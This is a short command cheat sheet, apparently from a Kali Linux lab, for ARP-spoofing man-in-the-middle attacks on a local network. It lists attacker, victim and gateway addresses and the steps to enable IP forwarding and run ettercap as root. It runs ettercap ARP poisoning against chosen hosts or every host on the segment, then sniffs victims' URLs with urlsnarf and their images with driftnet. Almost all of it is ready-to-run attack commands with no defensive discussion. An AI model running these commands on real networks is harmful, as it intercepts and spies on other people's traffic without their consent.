ARP Spoofing:
`````````````
1) Attacker's Machine
IP	: 192.168.206.128 
MAC : 96:45:c4

2) Victim's Machine
IP 	: 192.168.206.131
MAC : 7B:13:98

3) Gateway ( $ route -n )
IP	: 192.168.206.2 
MAC : FC:6A:71 ( $ nmap -sn 192.168.206.2 )

To check ARP table:
$ arp -a

Install:

$ sudo apt install dsniff -y


Enable IP_FORWARD:
``````````````````
──(root㉿kali)-[~]
└─# cat /proc/sys/net/ipv4/ip_forward
0

┌──(root㉿kali)-[~]
└─# echo 1 > /proc/sys/net/ipv4/ip_forward

┌──(root㉿kali)-[~]
└─# cat /proc/sys/net/ipv4/ip_forward
1

ettercap :


GUI : ettercap -G
CLI : ettercap -T [ text mode ]


# vim /etc/ettercap/etter.conf

ec_uid = 65534
ec_gid = 65534

to

ec_uid = 0
ec_gid = 0

:wq

MITM:ARP
``````````

# ettercap -i eth0 -TqM ARP //x.x.x.x/ //x.x.x.x/


/// : GROUP1 
/// : GROUP2  

# ettercap -i eth0 -TqM ARP /// ///





URL Sniffing:
````````````

$ sudo urlsnarf -i eth0


Driftnet:
```````````
$ sudo apt install driftnet -y

$ sudo driftnet -i eth0















